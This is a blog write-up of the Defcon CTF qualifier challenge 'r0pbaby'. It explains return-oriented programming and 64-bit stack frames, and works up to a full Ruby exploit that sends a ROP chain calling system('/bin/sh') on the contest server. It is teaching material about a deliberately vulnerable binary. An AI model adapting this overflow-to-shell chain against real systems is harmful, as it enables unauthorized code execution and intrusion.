Defcon Quals: r0pbaby (simple 64-bit ROP)

This past weekend I competed in the Defcon CTF Qualifiers from the Legit Business Syndicate. In the past it’s been one of my favourite competitions, and this year was no exception!

Unfortunately, I got stuck for quite a long time on a 2-point problem (“wwtw”) and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!

r0pbaby is neat, because it’s an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode. Much of the time, it’s actually easier! You can see the binary, my solution, and other stuff I used on this github repo.

It might make sense to read a post I made in 2013 about a level in PlaidCTF called ropasaurusrex. But it’s not really necessary - I’m going to explain the same stuff again with two years more experience!

What is ROP?

Most modern systems have DEP - data execution prevention - enabled. That means that when trying to run arbitrary code, the code has be in memory that’s executable. Typically, when a process is running, all memory segments are either writable (+w) or executable (+x) - not both. That’s sometimes called “W^X”, but it seems more appropriate to just call it common sense.

ROP - return-oriented programming - is an exploitation technique that bypasses DEP. It does that by chaining together legitimate code that’s already in executable memory. This requires the attacker to either a) have complete control of the stack, or b) have control of rip/eip (the instruction pointer register) and the ability to change esp/rsp (the stack pointer) to point to another buffer.

As a quick example, let’s say you overwrite the return address of a vulnerable function with the address of libc’s sleep() function. When the vulnerable function attempts to return, instead of returning to where it’s supposed to (or returning to shellcode), it’ll return to the first line of sleep().

On a 32-bit system, sleep() will look at the next-to-next value on the stack to find out how long to sleep(). On a 64-bit system, it’ll look at the value of the rdi register for its argument, which is a little more elaborate to set up. When it’s done, it’ll return to the next value on the stack on both architectures, which could very well be another function.

So basically, sleep() expects its stack to look like on 32-bit:

+----------------------+
|...higher addresses...|
+----------------------+
|         1000         | <-- sleep() looks here for its param (on 32-bit)
+----------------------+
|     [return addr]    | <-- where esp will be when sleep() is entered
+----------------------+
|    [sleep's  addr]   | <-- return addr of previous function
+----------------------+
|...lower addresses....| <-- other data from previous function
+----------------------+

And on 64-bit:

+----------------------+
|...higher addresses...|
+----------------------+ <-- sleep()'s param is in rdi, so it's not needed here
|     [return addr]    | <-- where rsp will be when sleep() is entered
+----------------------+
|    [sleep's  addr]   | <-- return addr of previous function
+----------------------+
|...lower addresses....| <-- other data from previous function
+----------------------+

We’ll dive into deeper detail of how to set this up and see way more stack diagrams shortly. But let’s start from the beginning!

Taking a first look

When you run r0pbaby, or connect to their service, you will see a prompt (the program uses stdin/stdout for i/o):

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:

It’s worthwhile messing with the options a bit to get a feel for it:

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FFFF7FF8B28
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FFFF7883960
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: printf
Symbol printf: 0x00007FFFF7892F10
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): hello???
Invalid amount.
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:

We’ll look at option 3 more in a little while, but for now let’s take a quick look at options 1 and 2. The rest of this section isn’t directly applicable to the exploitation stuff, so you’re free to skip it if you want. :)

If you look at the results from option 1 and option 2, you’ll see one strange thing: the return from “Get libc address” is higher than the addresses of printf() and system(). It also isn’t page aligned (a multiple of 0x1000 (4096), usually), so it almost certainly isn’t actually the base address (which, in fairness, the level doesn’t explicitly say it is).

I messed around a bit out of curiosity. Here’s what I discovered…

First, run the program in gdb and get the address that they claim is libc:

$ gdb -q ./r0pbaby
Reading symbols from ./r0pbaby...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/ron/defcon-quals/r0pbaby/r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FFFF7FF8B28
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit

So that’s what it returns: 0x00007FFFF7FF8B28. Now we use ctrl-c to break into the debugger and figure out the real base address:

: ^C
Program received signal SIGINT, Interrupt.
0x00007ffff791e5e0 in __read_nocancel () from /lib64/libc.so.6
(gdb) info proc map
process 5475
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x555555554000     0x555555556000     0x2000        0x0 /home/ron/defcon-quals/r0pbaby/r0pbaby
      0x555555755000     0x555555757000     0x2000     0x1000 /home/ron/defcon-quals/r0pbaby/r0pbaby
      0x555555757000     0x555555778000    0x21000        0x0 [heap]
      0x7ffff7842000     0x7ffff79cf000   0x18d000        0x0 /lib64/libc-2.20.so
      0x7ffff79cf000     0x7ffff7bce000   0x1ff000   0x18d000 /lib64/libc-2.20.so
      0x7ffff7bce000     0x7ffff7bd2000     0x4000   0x18c000 /lib64/libc-2.20.so
      0x7ffff7bd2000     0x7ffff7bd4000     0x2000   0x190000 /lib64/libc-2.20.so
[...]

This tells us that the actual address where libc is loaded is 0x7ffff7842000. Theirs was definitely wrong!

On a Linux system, the first 4 bytes at the base address will usually be “\x7fELF” or “\x7f\x45\x4c\x46”. We can check the first four bytes at the actual base address to verify:

(gdb) x/8xb 0x7ffff7842000
0x7ffff7842000: 0x7f    0x45    0x4c    0x46    0x02    0x01    0x01    0x00
(gdb) x/8xc 0x7ffff7842000
0x7ffff7842000: 127 '\177'      69 'E'  76 'L'  70 'F'  2 '\002'        1 '\001'        1 '\001'        0 '\000'

And we can check the base address that the program tells us:

(gdb) x/8xb 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00    0x20    0x84    0xf7    0xff    0x7f    0x00    0x00

From experience, that looks like a 64-bit address to me (6 bytes long, starts with 0x7f if you read it in little endian), so I tried print it as a 64-bit value:

(gdb) x/xg 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00007ffff7842000

Aha! It’s a pointer to the actual base address! It seems a little odd to send that to the user, it does them basically no good, so I’ll assume that it’s a bug. :)

Stealing libc

If there’s one thing I hate, it’s attacking a level blind. Based on the output so far, it’s pretty clear that they’re going to want us to call a libc function, but they don’t actually give us a copy of libc.so! While it’s not strictly necessary, having a copy of libc.so makes this far easier.

I’ll post more details about how and why to steal libc in a future post, but for now, suffice to stay: if you can, beat the easiest 64-bit level first (like babycmd) and liberate a copy of libc.so. Also snag a 32-bit version of libc if you can find one. Believe me, you’ll be thankful for it later! To make it possible to follow the rest of this post, here’s libc-2.19.so from babycmd and here’s libc-2.20.so from my box, which is the one I’ll use for this writeup.

You might be wondering how to verify whether or not that actually IS the right library. For now, let’s consider that to be homework. I’ll be writing more about that in the future, I promise!

Find a crash

I played around with option 3 for awhile, but it kept giving me a length error. So I used the best approach for annoying CTF problems: I asked a teammate who’d already solved that problem. He’d reverse engineered the function already, saving me the trouble. :)

It turns out that the correct way to format things is by sending a length, then a newline, then the payload:

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 20
AAAAAAAAAAAAAAAAAAAA
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
Segmentation fault

Well, that may be one of the easiest ways I’ve gotten a segfault! But the work isn’t quite done. :)

rip control

Our first goal is going to be to get control of rip (that’s like eip, the instruction pointer, but on a 64-bit system). As you probably know by now, rip is the register that points to the current instruction being executed. If we move it, different code runs. The classic attack is to move eip to point at shellcode, but ROP is different. We want to carefully control rip to make sure it winds up in all the right places.

But first, let’s non-carefully control it!

The program indicates that it’s writing the r0p buffer to the stack, so the easiest thing to do is probably to start throwing stuff into the buffer to see what happens. I like to send a string with a series of values I’ll recognize in a debugger. Since it’s a 64-bit app, I send 8 “A”s, 8 “B”s, and so on. If it doesn’t crash. I send more.

$ gdb -q ./r0pbaby
(gdb) run

[...]

: 3
Enter bytes to send (max 1024): 32
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

Program received signal SIGSEGV, Segmentation fault.
0x0000555555554eb3 in ?? ()

All right, it crashes at 0x0000555555554eb3. Let’s take a look at what lives at the current instruction (pro-tip: “x/i $rip” or equivalent is basically always the first thing I run on any crash I’m investigating):

(gdb) x/i $rip
=> 0x555555554eb3:      ret

It’s crashing while attempting to return! That generally only happens when either the stack pointer is messed up…

(gdb) print/x $rsp
$1 = 0x7fffffffd918

…which it doesn’t appear to be, or when it’s trying to return to a bad address…

(gdb) x/xg $rsp
0x7fffffffd918: 0x4242424242424242

…which it is! It’s trying to return to 0x4242424242424242 (“BBBBBBBB”), which is an illegal address (the first two bytes have to be zero on a 64-bit system).

We can confirm this, and also prove to ourselves that NUL bytes are allowed in the input, by sending a couple of NUL bytes. I’m switching to using ‘echo’ on the commandline now, so I can easily add NUL bytes (keep in mind that because of little endian, the NUL bytes have to go after the “B”s, not before):

$ ulimit -c unlimited
$ echo -ne '3\n32\nAAAAAAAABBBBBB\0\0CCCCCCCCDDDDDDDD\n' | ./r0pbaby
[...]
Segmentation fault (core dumped)
$ gdb ./r0pbaby ./core
[...]
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x0000424242424242 in ?? ()

Now we can see that rip was successfully set to 0x0000424242424242 (“BBBBBB\0\0” because of little endian)!

How's the stack work again?

As I said at the start, reading my post about ropasaurusrex would be a good way to get acquainted with ROP exploits. If you’re pretty comfortable with stacks or you’ve recently read/understood that post, feel free to skip this section!

Let’s start by talking about 32-bit systems - where parameters are passed on the stack instead of in registers. I’ll explain how to deal with register parameters in 64-bit below.

Okay, so: a program’s stack is a run-time structure that holds temporary values that functions need. Things like the parameters, the local variables, the return address, and other stuff. When a function is called, it allocates itself some space on the stack by growing downward (towards lower memory addresses) When the function returns, the data’s all removed from the stack (it’s not actually wiped from memory, it just becomes free to get overwritten). The register rsp always points to the most recent thing pushed to the stack and the next thing that would be popped off the stack.

Let’s use sleep() as an example again. You call sleep() like this:

1: push 1000
2: call sleep

or like this:

1. mov [esp], 1000
2: call sleep

They’re identical, as far as sleep() is concerned. The first is a tiny bit more memory efficient and the second is a tiny bit faster, but that’s about it.

Before line 1, we don’t know or care what’s on the stack. We can look at it like this (I’m choosing completely arbitrary addresses so you can match up diagrams with each other):

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1040 |     (irrelevant)     |
       +----------------------+
0x103c |     (irrelevant)     |
       +----------------------+
0x1038 |     (irrelevant)     | <-- rsp
       +----------------------+
0x1034 |       (unused)       |
       +----------------------+
0x1030 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

Values lower than rsp are unused. That means that as far as the stack’s concerned, they’re unallocated. They might be zero, or they might contain values from previous function calls. In a properly working system, they’re never read. If they’re accidentally used (like if somebody declares a variable but forgets to initialize it), you could wind up with a use-after-free vulnerability or similar.

The value that rsp is pointing to and the values above it (at higher addresses) also don’t really matter. They’re part of the stack frame for the function that’s calling sleep(), and sleep() doesn’t care about those. It only cares about its own stack frame (a stack frame, as we’ll see, is the parameters, return address, saved registers, and local variables of a function - basically, everything the function stores on the stack and everything it cares about on the stack).

Line 1 pushes 1000 onto the stack. The frame will then look like this:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x103c |     (irrelevant)     |
       +----------------------+
0x1038 |     (irrelevant)     | <-- stuff from the previous function
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         | <-- rsp
       +----------------------+
0x1030 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

When you call the function at line 2, it pushes the return address onto the stack, like this:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    | <-- rsp
       +----------------------+
0x102c |       (unused)       |
       +----------------------+
0x1028 |       (unused)       |
       +----------------------+
0x1024 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

Note how rsp has moved from 0x1038 to 0x1034 to 0x1030 as stuff is added to the stack. But it always points to the last thing added!

Let’s look at how sleep() might be implemented. This is a very common function prelude:

100; sleep(): 101: push rbp 102: mov rbp, rsp 103: sub rsp, 0x20 104: …everything else…

(Note that those are line numbers for reference, not actual addresses, so please don’t get upset that the values don’t increment enough :) )

At line 100, the old frame pointer is saved to the stack:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    | <-- rsp
       +----------------------+
0x1028 |       (unused)       |
       +----------------------+
0x1024 |       (unused)       |
       +----------------------+
0x1020 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

Then at line 102, nothing on the stack changes. On line 103, 0x20 is subtracted from esp, which effectively reserves 0x20 (32) bytes for local variables:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    |
       +----------------------+
       |                      |
0x1028 |                      |
   -   |     [local vars]     | <-- rsp
0x1008 |                      |
       |                      |
       +----------------------+ <-- end of sleep()'s stack frame
       +----------------------+
0x1004 |       (unused)       |
       +----------------------+
0x1000 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

And that’s the entire stack frame for the sleep(0 function call! It’s possible that there are other registers preserved on the stack, in addition to rbp, but that doesn’t really change anything. We only care about the parameters and the return address.

If sleep() calls a function, the same process will happen:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    |
       +----------------------+
       |                      |
0x1028 |                      |
   -   |     [local vars]     |
0x1008 |                      |
       |                      |
       +----------------------+ <-- end of sleep()'s stack frame
       +----------------------+ <-- start of next function's stack frame
0x1004 |       [params]       |
       +----------------------+
0x1000 |     [return addr]    |
       +----------------------+
0x0ffc |     [saved frame]    |
       +----------------------+
       |                      |
0x0ffc |                      |
   -   |     [local vars]     |
0x0fb4 |                      |
       |                      |
       +----------------------+ <-- end of next function's stack frame
       +----------------------+
0x0fb0 |       (unused)       |
       +----------------------+
0x0fac |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

And so on, with the stack constantly growing towards lower addresses. When the function returns, the same thing happens in reverse order (the local vars are removed from the stack by adding to rsp (or replacing it with rbp), rbp is popped off the stack, and the return address is popped and returned to).

The parameters are cleared off the stack by either the caller or callee, depending on the compiler, but that won’t come into play for this writeup. However, when ROP is used to call multiple functions, unless the function clean up their own parameters off the stack, the exploit developer has to do it themselves. Typically, on Windows functions clean up after themselves but on other OSes they don’t (but you can’t rely on that). This is done by using a “pop ret”, “pop pop ret”, etc., after each function call. See my ropasaurusrex writeup for more details.

Enter: 64-bit

The fact that this level is 64-bit complicates things in important ways (and ways that I always seem to forget about till things don’t work).

Specifically, in 64-bit, the first handful of parameters to a function are passed in registers, not on the stack. I don’t have the order of registers memorized - I forget it after every CTF, along with whether ja/jb or jl/jg are the unsigned ones - but the first two are rdi and rsi. That means that to call the same sleep() function on 64-bit, we’d have this code instead:

1: mov rdi, 1000
2: call sleep

And its stack frame would look like this:

       +----------------------+
       |...higher addresses...|
       +----------------------+ <-- start of previous function's stack frame
       +----------------------+ <-- start of sleep()'s stack frame
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    |
       +----------------------+
       |                      |
0x1028 |                      |
   -   |     [local vars]     |
0x1008 |                      |
       |                      |
       +----------------------+ <-- end of sleep()'s stack frame
       +----------------------+
       |...lower addresses....|
       +----------------------+

No parameters, just the return address, saved frame pointer, and local variables. It’s exceedingly rare for the stack to be used for parameters on 64-bit.

Stacks: the important bit

Okay, so that’s a stack frame. A stack frame contains parameters, return address, saved registers, and local variables. On 64-bit, it usually contains the return address, saved registers, and local variables (no parameters).

But here’s the thing: when you enter a function - that is to say, when you start running the first line of the function - the function doesn’t really know where you came from. I mean, not really. It knows the return address that’s on the stack, but doesn’t really have a way to validate that it’s real (except with advanced exploitation mitigations). It also knows that there are some parameters right before (at higher addresses than) the return address, if it’s 32-bit. Or that rdi/rsi/etc. contain parameters if it’s 64-bit.

So let’s say you overwrote the return address on the stack and returned to the first line of sleep(). What’s it going to do?

As we saw, on 64-bit, sleep() expects its stack frame to contain a return address:

+----------------------+
|...higher addresses...|
+----------------------+
+----------------------+ <-- start of sleep()'s stack frame
|     [return addr]    | <-- rsp
+----------------------+
|     (unallocated)    |
+----------------------+
|...lower addressess...|
+----------------------+

sleep() will push some registers, make room for local variables, and really just do its own thing. When it’s all done, it’ll grab the return address from the stack, return to it, and somebody will move rsp back to the calling function’s stack frame (it, getting rid of the parameters from the stack).

Using system()

Because this level uses stdout and stdin for i/o, all we really have to do is make this call:

system("/bin/sh")

Then we can run arbitrary commands. Seems pretty simple, eh? We don’t even care where system() returns to, once it’s done the program can just crash!

You just have to do two things:

set rip to the address of system()
set rdi to a pointer to the string "/bin/sh" (or just "sh" if you prefer)

Setting rip to the address of system() is easy. We have the address of system() and we have rip control, as we discovered. It’s just a matter of grabbing the address of system() and using that in the overflow.

Setting rdi to the pointer to “/bin/sh” is a little more problematic, though. First, we need to find the address of “/bin/sh” somehow. Then we need a “gadget” to put it in rdi. A “gadget”, in ROP, refers to a small piece of code that performs an operation then returns.

It turns out, all of the above can be easily done by using a copy of libc.so. Remember how I told you it’d come in handy?

Finding "/bin/sh"

So, this is actually pretty easy. We need to find “/bin/sh” given a) the ability to leak an address in libc.so (which this program does by design), and b) a copy of libc.so. Even with ASLR turned on, any two addresses within the same binary (like within libc.so or within the binary itself) won’t change their relative positions to each other. Addresses in two different binaries will likely be different, though.

If you fire up IDA, and go to the “strings” tab (shift-F12), you can search for “/bin/sh”. You’ll see that “/bin/sh” will have an address something like 0x7ffff6aa307c.

Alternatively, you can use this gdb command (helpfully supplied by bla from io.sts):

(gdb) find /b 0x7ffff7842000,0x7ffff7bd4000, '/','b','i','n','/','s','h'
0x7ffff79a307c
warning: Unable to access 16000 bytes of target memory at 0x7ffff79d5d03, halting search.
1 pattern found.
(gdb) x/s 0x7ffff79a307c
0x7ffff79a307c: "/bin/sh"

Once you’ve obtained the address of “/bin/sh”, find the address of any libc function - we’ll use system(), since system() will come in handy later. The address will be something like 0x00007ffff6983960. If you subtract the two addresses, you’ll discover that the address of “/bin/sh” is 0x11f71c bytes after the address of system(). As I said earlier, that won’t change, so we can reliably use that in our exploit.

Now when you run the program:

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FFFF7883960

You can easily calculate that the address of the string “/bin/sh” will be at 0x00007ffff7883960 + 0x11f71c = 0x7ffff79a307c.

Getting "/bin/sh" into rdi

The next thing you’ll want to do is put “/bin/sh” into rdi. We can do that in two steps (recall that we have control of the stack - it’s the point of the level):

Put it on the stack
Find a "pop rdi" gadget

To do this, I literally searched for “pop rdi” in IDA. With the spaces and everything! :)

I found this in both my own copy of libc and the one I stole from babycmd:

.text:00007FFFF80E1DF1                 pop     rax
.text:00007FFFF80E1DF2                 pop     rdi
.text:00007FFFF80E1DF3                 call    rax

What a beautiful sequence! It pops the next value of the stack into rax, pops the next value into rdi, and calls rax. So it calls an address from the stack with a parameter read from the stack. It’s such a lovely gadget! I was surprised and excited to find it, though I’m sure every other CTF team already knew about it. :)

The absolute address that IDA gives us is 0x00007ffff80e1df1, but just like the “/bin/sh” string, the address relative to the rest of the binary never changes. If you subtract the address of system() from that address, you’ll get 0xa7969 (on my copy of libc).

Let’s look at an example of what’s actually going on when we call that gadget. You’re at the end of main() and getting ready to return. rsp is pointing to what it thinks is the return address, but is really “BBBBBBBB”-now-gadget_addr:

+----------------------+
|...higher addresses...|
+----------------------+
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|  0x00007ffff80e1df1  | <-- rsp
+----------------------+
|       AAAAAAAA       |
+----------------------+
|...lower addresses....|
+----------------------+

When the return happens, it looks like this:

+----------------------+
|...higher addresses...|
+----------------------+
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       | <-- rsp
+----------------------+
|  0x00007FFFF80E1DF1  |
+----------------------+
|       AAAAAAAA       |
+----------------------+
|...lower addresses....|
+----------------------+

The first instruction - pop rax - runs. rax is now 0x4343434343434343 (“CCCCCCCC”).

The second instruction - pop rdi - runs. rdi is now 0x4444444444444444 (“DDDDDDDD”).

Then the final instruction - call rax - is called. It’ll attempt to call 0x4343434343434343, with 0x4444444444444444 as its parameter, and crash. Controlling both the called address and the parameter is a huge win!

Putting it all together

I realize this is a lot to take in if you can’t read stacks backwards and forwards (trust me, I frequently read stacks backwards - in fact, I wrote this entire blog post with upside-down stacks before I noticed and had to go back and fix it! :) ).

Here’s what we have:

The ability to write up to 1024 bytes onto the stack
The ability to get the address of system()
The ability to get the address of "/bin/sh", based on the address of system()
The ability to get the address of a sexy gadget, also based on system(), that'll call something from the stack with a parameter from the stack

We’re overflowing a local variable in main(). Immediately before our overflow, this is what main()’s stack frame probably looks like:

+----------------------+
|...higher addresses...|
+----------------------+ <-- start of main()'s stack frame
|         argv         |
+----------------------+
|         argc         |
+----------------------+
|     [return addr]    | <-- return address of main()
+----------------------+
|     [saved frame]    | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     | <-- rsp
|                      |
|                      |
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+

Because you only get 8 bytes before you hit the return address, the first 8 bytes are probably overwriting the saved frame pointer (or whatever, it doesn’t really matter, but you can prove it’s the frame pointer by using a debugger and verifying that rbp is 0x4141414141414141 after it returns (it is)).

The main thing is, as we saw earlier, if you send the string “AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD”, the “BBBBBBBB” winds up as main()’s return address. That means the stack winds up looking like this before main() starts cleaning up its stack frame:

+----------------------+
|...higher addresses...|
+----------------------+ <-- WAS the start of main()'s stack frame
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|       BBBBBBBB       | <-- return address of main()
+----------------------+
|       AAAAAAAA       | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     |
|                      |
|                      | <-- rsp
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+

When main attempts to return, it tries to return to 0x4242424242424242 as we saw earlier, and it crashes.

Now, one thing we can do is return directly to system(). But your guess is as good as mine as to what’s in rdi, but you can bet it’s not going to be “/bin/sh”. So instead, we return to our gadget:

+----------------------+
|...higher addresses...|
+----------------------+ <-- start of main()'s stack frame
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|     gadget_addr      | <-- return address of main()
+----------------------+
|       AAAAAAAA       | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     |
|                      |
|                      | <-- rsp
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+

Since I have ASLR off on my computer (if you do turn it off, please make sure you turn it back on!), I can pre-compute the addresses I need.

Symbol system: 0x00007FFFF7883960 (from the program)

sh_addr = system_addr + 0x11f71c sh_addr = 0x00007ffff7883960 + 0x11f71c sh_addr = 0x7ffff79a307c

gadget_addr = system_addr + 0xa7969 gadget_addr = 0x00007ffff7883960 + 0xa7969 gadget_addr = 0x7ffff792b2c9

So now, let’s change the exploit we used to crash it a long time ago (we replace the “B”s with the address of our gadget, in little endian format:

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCCDDDDDDDD\n' | ./r0pbaby
Welcome to an easy Return Oriented Programming challenge...
[...]
Menu:
Segmentation fault (core dumped)

Great! It crashed as expected! Let’s take a look at HOW it crashed:

$ gdb -q ./r0pbaby ./core
Core was generated by `./r0pbaby'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00007ffff792b2cb in clone () from /lib64/libc.so.6
(gdb) x/i $rip
=> 0x7ffff792b2cb <clone+107>:  call   rax

It crashed on the call at the end of the gadget, which makes sense! Let’s check out what it’s trying to call and what it’s using as a parameter:

(gdb) print/x $rax
$1 = 0x4343434343434343
(gdb) print/x $rdi
$2 = 0x4444444444444444

It’s trying to call “CCCCCCCC” with the parameter “DDDDDDDD”. Awesome! Let’s try it again, but this time we’ll plug in our sh_address in place of “DDDDDDDD” to make sure that’s working (I strongly believe in incremental testing :) ):

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00CCCCCCCC\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby
[...]
Segmentation fault (core dumped)
$ gdb -q ./r0pbaby ./core
[...]
(gdb) x/i $rip
=> 0x7ffff792b2cb <clone+107>:  call   rax

It’s still crashing in the same place! We don’t have to check rax, we know it’ll be 0x4343434343434343 (“CCCCCCCC”) again. But let’s check out if rdi is right:

(gdb) print/x $rdi
$2 = 0x7ffff79a307c
(gdb) x/s $rdi
0x7ffff79a307c: "/bin/sh"

All right, the parameter is set properly!

One last step: Replace the return address (“CCCCCCCC”) with the address of system 0x00007ffff7883960:

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x60\x39\x88\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby

Unfortunately, you can’t return into system(). I couldn’t figure out why, but on Twitter Jan Kadijk said that it’s likely because system() ends when it sees the end of file (EOF) marker, which makes perfect sense.

So in the interest of proving that this actually returns to a function, we’ll call printf (0x00007FFFF7892F10) instead:

$ echo -ne '3\n32\nAAAAAAAA\xc9\xb2\x92\xf7\xff\x7f\x00\x00\x10\x2f\x89\xf7\xff\x7f\x00\x00\x7c\x30\x9a\xf7\xff\x7f\x00\x00\n' | ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Enter bytes to send (max 1024): 1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
/bin/sh

It prints out its first parameter - “/bin/sh” - proving that printf() was called and therefore the return chain works!

The exploit

Here’s the full exploit in Ruby. If you want to run this against your own system, you’ll have to calculate the offset of the “/bin/sh” string and the handy-dandy gadget first! Just find them in IDA or objdump or whatever and subtract the address of system() from them.

#!/usr/bin/ruby

require 'socket'

SH_OFFSET_REAL = 0x13669b
SH_OFFSET_MINE = 0x11f71c

GADGET_OFFSET_REAL = 0xb3e39
GADGET_OFFSET_MINE = 0xa7969

#HOST = "localhost"
HOST = "r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me"

PORT = 10436

s = TCPSocket.new(HOST, PORT)

# Receive until the string matches the regex, then delete everything
# up to the regex
def recv_until(s, regex)
  buffer = ""

  loop do
    buffer += s.recv(1024)
    if(buffer =~ /#{regex}/m)
      return buffer.gsub(/.*#{regex}/m, '')
    end
  end
end

# Get the address of "system"
puts("Getting the address of system()...")
s.write("2\n")
s.write("system\n")
system_addr = recv_until(s, "Symbol system: ").to_i(16)
puts("system() is at 0x%08x" % system_addr)

# Build the ROP chain
puts("Building the ROP chain...")
payload = "AAAAAAAA" +
  [system_addr + GADGET_OFFSET_REAL].pack("<Q") + # address of the gadget
  [system_addr].pack("<Q") +                      # address of system
  [system_addr + SH_OFFSET_REAL].pack("<Q") +     # address of "/bin/sh"
  ""

# Write the ROP chain
puts("Sending the ROP chain...")
s.write("3\n")
s.write("#{payload.length}\n")
s.write(payload)

# Tell the program to exit
puts("Exiting the program...")
s.write("4\n")

# Give sh some time to start
puts("Pausing...")
sleep(1)

# Write the command we want to run
puts("Attempting to read the flag!")
s.write("cat /home/r0pbaby/flag\n")

# Receive forever
loop do
  x = s.recv(1024)

  if(x.nil? || x == "")
    puts("Done!")
    exit
  end
  puts(x)
end

[update] Or... do it the easy way

After I posted this, I got a tweet from @gaasedelen informing me that libc has a “magic” address that will literally call exec() with “/bin/sh”, making much of this unnecessary for this particular level. You can find it by seeing where the “/bin/sh” string is referenced. You can return to that address and a shell pops.

But it’s still a good idea to know how to construct a ROP chain, even if it’s not strictly necessary. :)

Conclusion

And that’s how to perform a ROP attack against a 64-bit binary! I’d love to hear feedback!